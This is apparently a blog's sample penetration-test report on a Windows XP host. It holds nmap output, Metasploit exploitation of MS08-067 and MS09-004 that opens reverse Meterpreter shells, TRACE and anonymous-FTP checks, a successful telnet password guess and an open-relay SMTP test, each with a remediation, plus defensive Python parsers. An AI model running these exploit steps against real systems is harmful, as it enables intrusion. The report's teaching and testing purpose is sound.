https://myexploit.wordpress.com/myexploit2600_security_conference_talks/
I made the below about 8 years ago; please don’t consider it to be of real use today ;0)
Title: Pentest Results
Date of Testing: 1433-02-01
Assigned To: Client A
Number of Critical issues: 2
Number of High issues: 4
Name of Tester: MyExploitHQ
——————————————————
Nmap Results:
root@bt:~# nmap -sS -sC -sV --open Client-IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1433-02-01 12:19 BST
Nmap scan report for Client-IP-Address
Host is up (0.00033s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open telnet Microsoft Windows XP telnetd
25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM
MAC Address: 01:02:03:0a:0b:0c (Mickey Systems)
Service Info: Host: PC.name.com; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: PC, NetBIOS user: , NetBIOS MAC: 01:02:03:0a:0b:0c (Mickey Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: PC
| Domain name: name.com
| Forest name: name.com
| FQDN: PC.name.com
| NetBIOS computer name: PC
| NetBIOS domain name: name
|_ System time: 1433-02-01 12:19:39 UTC+1
| ms-sql-info:
| Windows server name: PC
| [Client-IP-Address\SQLEXPRESS]
| Instance name: SQLEXPRESS
| Version: Microsoft SQL Server 2005 RTM
| Version number: 9.00.1399.00
| Product: Microsoft SQL Server 2005
| Service pack level: RTM
| Post-SP patches applied: No
| TCP port: 1433
|_ Clustered: No
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
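The findings written up in the manual testing section are all read straight off the scan above (anonymous FTP, risky HTTP methods, cleartext telnet and FTP, SMB signing off). The following triage helper is an added example for this page, not part of the original report or of nmap itself: it parses a plain-text `nmap -sS -sC -sV --open` report into open ports and flags the NSE lines a reviewer would write up first. `SAMPLE_NMAP` is a constructed excerpt modelled on the scan output above; the flag strings are the ones the scan prints.

```python
"""Triage helper for plain-text nmap output (added example, not the report's own tooling)."""
import re

# Constructed sample, trimmed from the kind of output `nmap -sC -sV --open` prints.
SAMPLE_NMAP = """\
Nmap scan report for Client-IP-Address
Host is up (0.00033s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open telnet Microsoft Windows XP telnetd
80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM
Host script results:
| smb-security-mode:
| Account that was used for smb scripts: guest
|_ Message signing disabled (dangerous, but default)
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
"""

# "21/tcp open ftp Microsoft ftpd" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# NSE output fragments that indicate a finding, and the label to report it under.
FLAGS = {
    "Anonymous FTP login allowed": "anonymous FTP",
    "Potentially risky methods": "risky HTTP methods",
    "Message signing disabled": "SMB signing disabled",
}
# Services that carry credentials in the clear; flagged from the service name alone.
CLEARTEXT = {"ftp", "telnet"}


def parse_nmap(text):
    """Return (ports, findings).

    ports    -- list of dicts, one per open-port line
    findings -- list of (port or None, label); None means a host-level script
    """
    ports, findings = [], []
    current = None  # the port that the following "|" script lines belong to
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            }
            ports.append(current)
            if current["service"] in CLEARTEXT:
                findings.append((current["port"], "cleartext service: " + current["service"]))
            continue
        if line.startswith("Host script results"):
            current = None  # what follows is host-level, not tied to a port
            continue
        if line.startswith("|"):
            for needle, label in FLAGS.items():
                if needle in line:
                    findings.append((current["port"] if current else None, label))
    return ports, findings


def risky_http_methods(text):
    """Extract the verb list from the http-methods script line, or [] if absent."""
    for line in text.splitlines():
        if "Potentially risky methods:" in line:
            return line.split("Potentially risky methods:", 1)[1].split()
    return []


if __name__ == "__main__":
    ports, findings = parse_nmap(SAMPLE_NMAP)
    for p in ports:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<13} {p['version']}")
    for port, label in findings:
        print(f"  [!] {port if port is not None else 'host'}: {label}")
```

Run it against a saved `-oN` report to get the same finding list the manual section below walks through; anything it flags still needs a hand check before it goes in a report.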
------------------------------------------------------
Manual testing:
------------------------------------------------------
Microsoft Security Bulletin MS08-067 - Critical
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
1. Windows XP + 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds = metasploit-ms08_067_netapi
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set lhost Tester-IP-Address
msf exploit(ms08_067_netapi) > set rhost Client-IP-Address
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on Tester-IP-Address:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 1 opened (Tester-IP-Address:4444 -> Client-IP-Address:1046) at 1433-02-01 12:23:29 +0100
meterpreter > shell
Process 3728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Priority: Critical
Recommendation: Apply the MS08-067 update immediately, and review and install all other security updates as recommended by the vendor.
------------------------------------------------------
Microsoft Security Bulletin MS09-004 - Important
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)
2. 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM = metasploit-mssql-ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost Tester-IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost Client-IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit
[*] Started reverse handler on Tester-IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 2 opened (Tester-IP-Address:4444 -> Client-IP-Address:1053) at 1433-02-01 12:26:12 +0100
meterpreter > shell
Process 2324 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Priority: Critical
Recommendation: Apply the MS09-004 update immediately, and review and install all other security updates as recommended by the vendor.
------------------------------------------------------
3. Testing for HTTP Methods and XST (OWASP-CM-008)
Nmap discovered 80/tcp open http Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPA
root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
OPTIONS / HTTP/1.1
Host: Client-IP-Address
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:36:38 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private
Testing TRACE proves positive, as seen below: the response mirrors Host: Client-IP-Address back in the reply.
root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
TRACE / HTTP/1.1
Host: Client-IP-Address
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:38:37 GMT
Content-Type: message/http
Content-Length: 42
TRACE / HTTP/1.1
Host: Client-IP-Address
Priority: High
Recommendation: Install the Microsoft UrlScan Security Tool. The urlscan.ini file shipped with UrlScan sets "UseAllowVerbs=1" by default, and its [AllowVerbs] section lists only the HTTP methods GET, HEAD and POST, so simply installing UrlScan blocks TRACE and TRACK.
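The two checks in this item (which verbs the server advertises beyond a GET/HEAD/POST allow list, and whether TRACE reflects the request) can be verified offline from captured responses. The code below is an added example written for this page, not part of the original report or of any IIS or UrlScan tooling: `OPTIONS_RESPONSE`, `TRACE_REQUEST` and `TRACE_RESPONSE` are constructed from the transcript above, and `TRACE_BLOCKED` is an assumed hardened reply (verb refused, nothing echoed) used to show what the check reports after the fix.

```python
"""Offline verifier for risky-verb advertisement and TRACE reflection (added example)."""

SAFE_VERBS = {"GET", "HEAD", "POST"}  # UrlScan's default [AllowVerbs] entries

# Constructed OPTIONS reply modelled on the transcript (CRLF line endings as on the wire).
OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.1\r\n"
    "MS-Author-Via: DAV\r\n"
    "Content-Length: 0\r\n"
    "DAV: 1, 2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "\r\n"
)

TRACE_REQUEST = "TRACE / HTTP/1.1\r\nHost: Client-IP-Address\r\n\r\n"

# Vulnerable behaviour from the transcript: 200 with a message/http body that is the request itself.
TRACE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.1\r\n"
    "Content-Type: message/http\r\n"
    f"Content-Length: {len(TRACE_REQUEST)}\r\n"
    "\r\n" + TRACE_REQUEST
)

# Assumed hardened behaviour (constructed): the verb is refused and nothing is echoed.
TRACE_BLOCKED = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Microsoft-IIS/5.1\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def advertised_verbs(raw_options):
    """Union of the verbs listed in the Allow and Public headers of an OPTIONS reply."""
    _, headers, _ = parse_response(raw_options)
    verbs = set()
    for name in ("allow", "public"):
        verbs |= {v.strip().upper() for v in headers.get(name, "").split(",") if v.strip()}
    return verbs


def extra_verbs(raw_options, safe=SAFE_VERBS):
    """Verbs the server advertises that a GET/HEAD/POST allow list would reject."""
    return sorted(advertised_verbs(raw_options) - safe)


def trace_reflected(request, raw_response):
    """True when the reply is a 200 whose message/http body echoes the request
    line and Host header, i.e. the server reflects TRACE (the XST condition)."""
    status, headers, body = parse_response(raw_response)
    if status != 200 or not headers.get("content-type", "").startswith("message/http"):
        return False
    request_line, host_line = request.split("\r\n")[:2]
    return request_line in body and host_line in body


if __name__ == "__main__":
    print("verbs outside the allow list:", ", ".join(extra_verbs(OPTIONS_RESPONSE)))
    print("TRACE reflected (unpatched):", trace_reflected(TRACE_REQUEST, TRACE_RESPONSE))
    print("TRACE reflected (hardened):", trace_reflected(TRACE_REQUEST, TRACE_BLOCKED))
```

After UrlScan is installed, re-capture the OPTIONS and TRACE replies and run them through the same two functions: `extra_verbs` should drop the WebDAV verbs and TRACE, and `trace_reflected` should return False.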
------------------------------------------------------
4. Testing Anonymous FTP
Nmap discovered 21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Using Firefox, browsing ftp://Client-IP-Address/ is not met with any restrictions.
------------------------------------------------------
5. Using Metasploit to test FTP
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set rhosts Client-IP-Address
msf auxiliary(anonymous) > run
[*] Client-IP-Address:21 Anonymous READ (220 Microsoft FTP Service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Priority: High
Recommendation: If FTP file share access is not required, disable the service. If it is required, restrict access to the service by source IP address.
------------------------------------------------------
6. Testing telnet access
Nmap discovered 23/tcp open telnet Microsoft Windows XP telnetd
root@bt:~# telnet Client-IP-Address
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: administrator
password: password
Logon failure: unknown user name or bad password.
Login Failed
login: administrator
password: Password
Logon failure: unknown user name or bad password.
Login Failed
login: administrator
password: p@ssw0rd
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\Documents and Settings\>C:\Documents and Settings\>
Priority: High
Recommendation: Enforce a strong password policy. If remote command-line access is required, use SSH rather than telnet, as SSH traffic is encrypted.
------------------------------------------------------
7. Testing smtp access
Nmap discovered 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
root@bt:~# telnet Client-IP-Address 25
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
220 PC.name.com Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 ready at Thu, 01 Jan 1433 13:27:19 +0100
helo
250 PC.name.com Hello [Tester-IP-Address]
mail from:test@mail-test.com
50 2.1.0 test@mail-test.com....Sender OK
rcpt to:test@frogme.com
250 2.1.5 test@frogme.com
data
354 Start mail input; end with .
subject: TEST
test
.
250 2.6.0 Queued mail for delivery
quit
221 2.0.0 PC.name.com Service closing transmission channel
Connection closed by foreign host.
Priority: High
Recommendation: Relay is enabled and needs to be restricted.
Administrative Tools / Internet Information Services / local computer / Default SMTP Virtual Server – right click Properties / Access tab / Relay… (Options here)
If you see 550 5.7.1 Unable to relay for test@frogme.com, relay is set to "Only list below". This will block the ability to send spam through the server.
——————————————————
For more information:
https://myexploit.wordpress.com/information-gathering-nmap/
http://www.myexploit.wordpress.com/control-metasploit-ms08_067_netapi/
http://www.myexploit.wordpress.com/control-metasploit-auxiliary_scanner_http/
http://www.myexploit.wordpress.com/control-metasploit-ftp_login/
http://www.myexploit.wordpress.com/control-metasploit-mssql-ms09_004_sp_replwritetovarbin/
Awesome man.. This is the best blog 🙂
It gave me a lot of info for my OSCP course.
Thanks Shinto, myexploit appreciates feedback like this. Well done on doing the OSCP!